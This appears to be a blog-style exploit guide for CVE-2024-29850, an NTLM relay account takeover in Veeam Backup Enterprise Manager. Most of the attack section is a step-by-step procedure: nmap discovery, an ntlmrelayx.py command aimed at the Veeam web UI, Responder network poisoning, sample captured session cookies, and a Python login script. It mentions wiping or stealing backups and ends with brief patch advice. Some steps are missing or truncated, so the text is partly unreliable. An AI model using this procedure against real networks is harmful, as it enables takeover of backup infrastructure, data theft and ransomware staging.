CVE-2024-29850 - Veeam Backup Enterprise Manager Account Takeover via NTLM Relay — Full Exploit & Guide

In the infosec world, authentication flaws often turn into devastating vulnerabilities. The newly disclosed CVE-2024-29850 in Veeam Backup Enterprise Manager is exactly that: a severe authentication issue allowing an attacker to take over any account — even admins — via an NTLM relay attack. This article breaks down the vulnerability, demonstrates how the exploitation works step-by-step, and shares everything you need to know to protect your environment.

What is CVE-2024-29850?

CVE-2024-29850 is a critical vulnerability in Veeam Backup Enterprise Manager (VBEM) that allows attackers to authenticate as any domain user, including admins, simply by relaying NTLM credentials. The underlying problem? The service accepts NTLM-based authentication and doesn't properly verify it, making it a prime target for NTLM relay attacks.

CVSS Score: 9.8 (Critical)

See the official NVD entry.

Access & exfiltrate all backup files (potential ransomware or data theft)

For organizations that depend on Veeam for their backup/resilience strategy, this isn’t just a bug — it’s a business continuity ticking time bomb.

1. Setup:

Attackers must be in a position to intercept or relay NTLM authentication attempts on your local network (e.g. via Responder, mitm6, or poisoning LLMNR/NBNS traffic).

2. Relay the NTLM Hash:

When a victim’s session is relayed to the Veeam Backup Enterprise Manager web interface (:9443/ by default), the application accepts the NTLM token and logs the attacker in as the victim, requiring no further checks.

3. Account Takeover:

The attacker gets a valid session, gaining access to the entire backup management UI. If target user is an admin — game over.

1. Identify VBEM Server:

nmap -p 9443 -sV <target-ip>
# Look for Veeam Backup Enterprise Manager service

We’ll use Impacket (ntlmrelayx.py)

ntlmrelayx.py -t https://<veeam-backup-ip>:9443/ -smb2support

This command tells impacket to relay any incoming NTLM handshakes to the Veeam server web UI.

3. Launch Responder to Poison Network:

sudo responder -I eth

This tool listens for and poisons LLMNR/NBNS/mDNS requests, tricking Windows devices to authenticate to the attacker’s machine.

4. Wait for a Victim or Target a User:

- When any user on the domain tries to access a resource, Responder triggers and collects their NTLM token.

ntlmrelayx will print out a session cookie or credentials

[*] HTTP User 'CORP\jdoe' authenticated successfully to https://<veeam>:9443/
[*] Cookies: 
  Set-Cookie: ASP.NET_SessionId=abcd1234efgh5678; path=/; HttpOnly; Secure; SameSite=None

Now, you can *browse to the web UI as the victim, change settings, download, modify, or wipe backups*.

Real-World Exploit: Example Code

The following is a Python example using requests_ntlm to manually authenticate, if you already have a user's NTLM hash or relay it from another channel:

import requests
from requests_ntlm import HttpNtlmAuth

url = "https://<veeam-server>:9443/";

# Replace DOMAIN\\username and password with victim's credentials
session = requests.Session()
session.auth = HttpNtlmAuth('DOMAIN\\username', 'password')

resp = session.get(url, verify=False)
if "Enterprise Manager" in resp.text:
    print("[+] Successfully logged in!")
else:
    print("[-] Login failed.")

> Note: In real-life, you’d use an NTLM relay proxy (impacket, mitm6, responder) rather than cleartext credentials.

How To Patch

Veeam released fixes as of April 2024.
All users must urgently update their Veeam Backup Enterprise Manager to version 12.1.2.172 or newer.

Patch page:
Veeam KB4595 - Vulnerability fix

More References & Deep Dives

- NVD: CVE-2024-29850
- Impacket Tool: https://github.com/SecureAuthCorp/impacket
- Responder: https://github.com/lgandx/Responder
- Mitm6: https://github.com/fox-it/mitm6
- Veeam Security Advisory: https://www.veeam.com/kb4595

While patching is mandatory, you can add temporary mitigations

- Block LLMNR/NBNS in Windows environments (via Group Policy)

Final Thoughts

CVE-2024-29850 makes it painfully clear: legacy authentication protocols (like NTLM) and poor verification put your organization at serious risk. This flaw is low-hanging fruit for attackers who can set up relays and snatch control of your *entire backup infrastructure* — possibly the last defense you have in a ransomware scenario.

Patch now, check your logs, and learn how NTLM relay works — it’s not just a theoretical risk anymore.

Timeline

Published on: 05/22/2024 23:15:08 UTC
Last modified on: 07/12/2024 20:28:19 UTC